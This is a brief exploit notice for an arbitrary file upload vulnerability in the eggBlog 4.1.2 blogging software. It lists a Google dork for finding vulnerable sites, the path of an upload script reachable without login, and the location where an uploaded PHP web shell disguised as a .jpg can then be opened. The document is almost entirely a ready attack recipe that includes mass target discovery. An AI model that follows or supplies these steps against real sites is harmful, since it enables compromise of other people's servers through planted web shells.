# Exploit Title: eggBlog Arbitrary File Upload Vulnerability # Google Dork:"powered by eggBlog.net" # Date: 28/04/2013 # Exploit Author: Pokk3rs # Vendor Homepage: http://eggblog.net/ # Software Link: http://sourceforge.net/projects/eggblog/files/eggBlog%204/v4.1.2/ # Tested on: Win8 Pro x64 Expl0itation 1 - Google Dork:"powered by eggBlog.net" 2 - http://server/[path]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg= 3 - http://server/[path]/photos/uploads/shell.php.jpg